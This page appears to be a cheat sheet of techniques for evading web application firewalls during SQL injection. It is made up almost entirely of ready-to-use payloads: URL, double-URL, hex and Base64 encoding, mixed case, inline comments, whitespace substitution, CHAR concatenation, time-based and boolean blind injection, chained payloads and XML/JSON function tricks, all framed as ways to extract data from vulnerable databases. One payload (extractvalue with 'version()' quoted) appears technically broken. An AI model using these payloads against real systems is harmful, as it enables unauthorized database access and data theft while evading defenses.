πWAF Bypass Techniques for SQL Injection
Below are various methods to bypass WAFs & execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, & manipulation strategies to evade detection.
WAF Bypass Techniques for SQL Injection
1. Using Encoding and Obfuscation
URL Encoding
Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.
%27%20UNION%20SELECT%20NULL,NULL,NULL--
Double URL Encoding
Double encode the payload to evade more sophisticated detection mechanisms.
%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--
Hex Encoding
Use hexadecimal encoding for the payload to obscure the SQL commands.
' UNION SELECT 0x61646D696E, 0x70617373776F7264 --
2. Case Manipulation and Comments
Mixed Case
Change the case of SQL keywords to avoid case-sensitive filters.
' uNioN SeLecT NULL, NULL --
Inline Comments
Insert comments within SQL keywords to break up recognizable patterns.
' UNION/**/SELECT/**/NULL,NULL --
3. Whitespace and Special Characters
Using Different Whitespace Characters
Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters.
' UNION%0D%0ASELECT%0D%0A NULL,NULL --
Concatenation with Special Characters
Use special characters and concatenation functions to dynamically build the payload.
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
4. SQL Function and Command Obfuscation
String Concatenation
Break strings into smaller parts and concatenate them to obscure the payload.
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
Using SQL Functions
Leverage SQL functions to manipulate and obfuscate the payload.
' UNION SELECT VERSION(), DATABASE() --
5. Time-Based and Boolean-Based Payloads
Time-Based Blind SQL Injection
Use time delays to infer information based on the response time.
' AND IF(1=1, SLEEP(5), 0) --
Boolean-Based Blind SQL Injection
Use conditional statements to alter the response based on true or false conditions.
' AND IF(1=1, 'A', 'B')='A' --
6. Advanced Encoding Techniques
Base64 Encoding
Encode payloads using Base64 to bypass content filters.
' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --
Custom Encoding Scripts
Develop custom scripts to encode and decode payloads in different formats to evade detection.
7. Chaining Techniques
Combining Multiple Bypass Techniques
Combine various techniques to create more complex and harder-to-detect payloads.
%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A
8. Leveraging Lesser-Known SQL Features
Using JSON Functions
Leverage JSON functions to manipulate and extract data in a more complex manner.
' UNION SELECT json_extract(column_name, '$.key') FROM table_name --
Using XML Functions
Utilize XML functions to construct more sophisticated payloads.
' UNION SELECT extractvalue(1, 'version()') --
These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection and extract data from vulnerable databases.
Last updated
Was this helpful?